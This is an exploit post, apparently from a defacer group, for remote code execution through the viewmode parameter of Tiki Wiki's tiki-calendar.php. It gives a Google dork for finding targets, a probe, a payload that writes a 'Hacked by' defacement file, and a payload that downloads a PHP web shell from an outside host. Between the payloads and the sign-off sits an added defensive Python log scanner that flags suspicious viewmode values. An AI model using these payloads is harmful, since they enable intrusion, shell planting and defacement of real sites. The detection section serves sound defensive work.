Remote command execution in Tiki Wiki calendar: shell upload and deface.

Google Dork: inurl:tiki-calendar.php
Vulnerable versions: ALL supported versions of Tiki (14.2, 12.5 LTS, 9.11 LTS and 6.15) (if not patched)

#validate vulnerability
site.com/path/tiki-calendar.php?viewmode=';print(TikiWikiRCE);$a=' waw vuln :v

#Make a file
site.com/path/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22index6.php%22,%27w%27);%20fwrite($z,(%22Hacked by Unnamed48%22));fclose($z);$a=%27

file created on site.com/path/index6.php

#upload php shell
site.com/path/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://www.heron-photography.co.uk/shell.txt%22%29%29;fclose%28$z%29;%27

your shell site.com/path/shell.php
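
For defenders: every request above carries its payload in the `viewmode` query parameter of `tiki-calendar.php`, so web access logs show it directly. The following is an added example, not part of the original post: a log check that percent-decodes `viewmode` and flags any value that is not a plain word. The safe-value pattern, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: legitimate viewmode values are short plain words such as "month".
SAFE_VIEWMODE = re.compile(r"[A-Za-z0-9_]{0,32}")
# Common/combined log format: client IP, request line, status code.
LOG_LINE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample access-log lines (documentation IP ranges, made-up paths).
# The flagged value is the validation probe shown on this page, raw and encoded.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2016:10:00:00 +0000] "GET /tiki/tiki-calendar.php?viewmode=month HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2016:10:00:05 +0000] "GET /tiki/tiki-calendar.php?viewmode=\';print(TikiWikiRCE);$a=\' HTTP/1.1" 200 5200',
    '203.0.113.9 - - [01/Jan/2016:10:00:09 +0000] "GET /tiki/tiki-calendar.php?todate=1&viewmode=%27%3Bprint(TikiWikiRCE)%3B%24a%3D%27 HTTP/1.1" 200 5200',
    '198.51.100.7 - - [01/Jan/2016:10:01:00 +0000] "GET /tiki/tiki-index.php?page=Home HTTP/1.1" 200 900',
]


def suspicious_viewmode(line):
    """Return (ip, status, decoded viewmode) when a tiki-calendar.php request
    carries a viewmode value that is not a plain word; otherwise None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    path, _, query = target.partition("?")
    if not path.lower().endswith("/tiki-calendar.php"):
        return None
    # Split on "&" by hand so ";" inside the value is never treated as a separator.
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key).lower() != "viewmode":
            continue
        value = unquote_plus(raw)  # decode first so %27 and ' are treated alike
        if not SAFE_VIEWMODE.fullmatch(value):
            return ip, int(status), value
    return None


def scan(lines):
    """Collect every suspicious hit from an iterable of log lines."""
    return [hit for hit in map(suspicious_viewmode, lines) if hit]


if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} viewmode={value!r}")
```

A hit means the parameter was probed; on an unpatched install, also check the Tiki directory for PHP files created at or after the request time.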
---
Don't understand? Watch the video

thx to my team res7ock crew | thx to all indonesian defacer | thx to my oshi shani :*
bye bye
exploit on video here

